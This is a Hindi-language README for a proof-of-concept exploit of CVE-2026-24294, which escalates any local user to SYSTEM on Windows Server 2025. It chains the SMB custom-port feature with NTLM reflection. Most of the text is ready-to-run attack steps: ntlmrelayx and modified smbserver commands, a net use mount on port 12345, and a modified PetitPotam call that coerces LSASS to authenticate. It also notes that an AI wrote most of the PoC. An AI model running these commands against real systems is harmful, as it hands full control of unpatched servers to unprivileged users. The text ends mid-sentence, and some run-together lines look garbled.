
स्थानीय विशेषाधिकार वृद्धि PoC for CVE-2026-24294, SMB मनमाना पोर्ट और NTLM रिफ्लेक्शन का दुरुपयोग करके Windows Server 2025 पर SYSTEM प्राप्त करने के लिए।
Windows Server 2025 पर स्थानीय विशेषाधिकार वृद्धि, NTLM रिफ्लेक्शन के माध्यम से, Windows 11 24H2 / Server 2025 में पेश की गई SMB मनमाना पोर्ट सुविधा का दुरुपयोग करते हुए।
Windows 11 24H2 / Server 2025 ने एक SMB क्लाइंट सुविधा पेश की जो मनमाने TCP पोर्ट पर कनेक्शन की अनुमति देती है (net use \\host\share /tcpport:PORT)। SMB सत्र मल्टीप्लेक्सिंग (MS-SMB2 अनुभाग 3.2.4.2) के साथ संयुक्त, यह स्थानीय NTLM रिफ्लेक्शन को सक्षम बनाता है — एक निम्न-विशेषाधिकार वाला उपयोगकर्ता एक विशेषाधिकार प्राप्त सेवा (LSASS) को एक गैर-मानक पोर्ट पर हमलावर-नियंत्रित SMB सर्वर पर प्रमाणित करने के लिए मजबूर कर सकता है, फिर कैप्चर किए गए NTLM प्रमाणीकरण को पोर्ट 445 पर वास्तविक SMB सेवा पर रिले कर सकता है।
प्रभाव: किसी भी स्थानीय उपयोगकर्ता से NT AUTHORITY\SYSTEM।
प्रभावित: Windows Server 2025 (डिफ़ॉल्ट कॉन्फ़िगरेशन)। Windows 11 24H2 SMB साइनिंग लागू करता है, जो रिले को अवरुद्ध करता है।
LSASS (SYSTEM) ──NTLM──► SMB क्लाइंट ──TCP:12345──► smbserver.py (हमारा)
│
▼ NTLM ब्लॉब रिले करें
SMB सेवा (:445) ◄────────────────── ntlmrelayx.py
← SYSTEM सत्र
net use हमारे SMB सर्वर पर एक कस्टम पोर्ट पर TCP कनेक्शन खोलता है\\127.0.0.1\share पर प्रमाणित करने के लिए मजबूर करता है3 टर्मिनल खोलें।
टर्मिनल 1 — ntlmrelayx प्रारंभ करें (RAW पोर्ट 6666 पर सुनता है, लोकलहोस्ट SMB पर रिले करता है):
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666
टर्मिनल 2 — संशोधित smbserver प्रारंभ करें (पोर्ट 12345 पर सुनता है, NTLM को पोर्ट 6666 पर रिले करता है):
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666
टर्मिनल 3 — एक्सप्लॉइट चलाएँ:
:: कस्टम पोर्ट पर शेयर माउंट करें (स्थायी TCP कनेक्शन खोलता है)
net use \\127.0.0.1\test /tcpport:12345 /user:user user
:: LSASS को हमारे SMB सर्वर पर प्रमाणित करने के लिए मजबूर करें
PetitPotam.exe 127.0.0.1 localhost 2
ntlmrelayx से whoami आउटपुट NT AUTHORITY\SYSTEM दिखाएगा।
PetitPotam/ — संशोधित PetitPotam स्रोत। अपस्ट्रीम से दो परिवर्तन:
df1941c5-fe89-4e79-bf10-463657acf44d (WS2025 EFSRPC इंटरफ़ेस)\pipe\efsrpcEfsRpcEncryptFileSrv) का उपयोग करता है, शेयर नाम test के रूप में हार्डकोडेड हैsmbserver.py — -relay-port फ्लैग के साथ संशोधित impacket smbserver। मल्टीप्लेक्स्ड कनेक्शन पर दूसरे NTLM प्रमाणीकरण को कैप्चर करने और इसे RAW रिले सर्वर (ntlmrelayx --raw-port) पर रिले करने के लिए SMB2 SESSION_SETUP को हुक करता है।यह PoC मुख्य रूप से AI (GLM 5.1) द्वारा निम्नलिखित में वर्णित शोध और तकनीकों के आधार पर लिखा गया था: